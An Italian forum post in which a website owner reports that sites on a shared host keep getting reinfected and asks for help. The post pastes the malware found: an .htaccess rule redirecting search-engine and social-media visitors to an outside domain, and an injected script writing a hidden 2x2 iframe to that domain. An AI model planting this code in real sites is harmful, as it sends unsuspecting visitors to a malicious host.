Salve a tutti, da alcuni giorni ho un problema che era già stato segnalato in un altro thread.
I miei siti internet (tutti presenti sullo stesso host) si sono infettati con un malware (è stato google chrome a segnalarmelo) che si presenta con un file .htaccess nella root principale e poi con un javascript che viene inserito casualmente in alcune pagine.
Il file htaccess contiene le seguente istruzioni:



#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|alles klar|allpages|allthesites|alltheuk|alltheweb|altav ista|america|amfibi|aol|apollo7|aport|arcor|ask|at search|baidu|bellnet|bestireland|bhanvad|bing|blog |bluewin|botw|brainysearch|bricabrac|browseireland |chapu|claymont|click4choice|clickey|clickz|clush| confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eni ro|entireweb|euroseek|exalead|excite|express|faceb ook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|f lemiro|flickr|freenet|friendsreunited|galaxy|gasta |gigablast|gimpsy|globalsearchdirectory|goo|google |goto|gulesider|hispavista|hotbot|hotfrog|icq|iese arch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|k eyweb|kingdomseek|klammeraffe|km|kobala|kompass|kp nvandaag|kvasir|libero|limier|linkedin|live|livein ternet|lookle|lycos|mail|mamma|metabot|metacrawler |metaeureka|mojeek|msn|myspace|netscape|netzindex| nigma|nlsearch|nol9|oekoportal|openstat|orange|pas sagen|pocketflier|qp|qq|rambler|rtl|savio|schnells uche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyh ired|slider|sol|splut|spray|startpagina|startsiden |sucharchiv|suchbiene|suchbot|suchknecht|suchmasch ine|suchnase|sympatico|telfort|telia|teoma|terra|t he-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|v kontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wik ipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|y ippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://niu-sae.com/stats.php [R=301,L]
</IfModule>
#/c3284d#



Mentre il javascript è lo stesso che era stato segnalato precedentemente:


<script language="JavaScript">
<!--
function FP_swapImg() {//v1.0
var doc=document,args=arguments,elm,n; doc.$imgSwaps=new Array(); for(n=2; n<args.length;
n+=2) { elm=FP_getObjectByID(args[n]); if(elm) { doc.$imgSwaps[doc.$imgSwaps.length]=elm;
elm.$src=elm.src; elm.src=args[n+1]; } }
}

function FP_preloadImgs() {//v1.0
var d=document,a=arguments; if(!d.FP_imgs) d.FP_imgs=new Array();
for(var i=0; i<a.length; i++) { d.FP_imgs[i]=new Image; d.FP_imgs[i].src=a[i]; }
}

function FP_getObjectByID(id,o) {//v1.0
var c,el,els,f,m,n; if(!o)o=document; if(o.getElementById) el=o.getElementById(id);
else if(o.layers) c=o.layers; else if(o.all) el=o.all[id]; if(el) return el;
if(o.id==id || o.name==id) return o; if(o.childNodes) c=o.childNodes; if(c)
for(n=0; n<c.length; n++) { el=FP_getObjectByID(id,c[n]); if(el) return el; }
f=o.forms; if(f) for(n=0; n<f.length; n++) { els=f[n].elements;
for(m=0; m<els.length; m++){ el=FP_getObjectByID(id,els[n]); if(el) return el; } }
return null;
}
// -->
</script>

<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false"><script type="text/javascript">
document.write('<iframe src="http://niu-sae.com/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>


io ne capisco veramente poco e avrei bisogno di aiuto. Ho scansionato il mio computer ma non sono presenti malware. Ho provato a cancellare i siti online e a ripubblicarli ma dopo 1 o 2 giorni ricompare il file .htaccess e poi il javascript in alcune pagine. Ho scritto ai proprietari dello spazio web per avere delucidazioni. Sono in attesa di risposte. Sapreste darmi qualche consiglio? Grazie.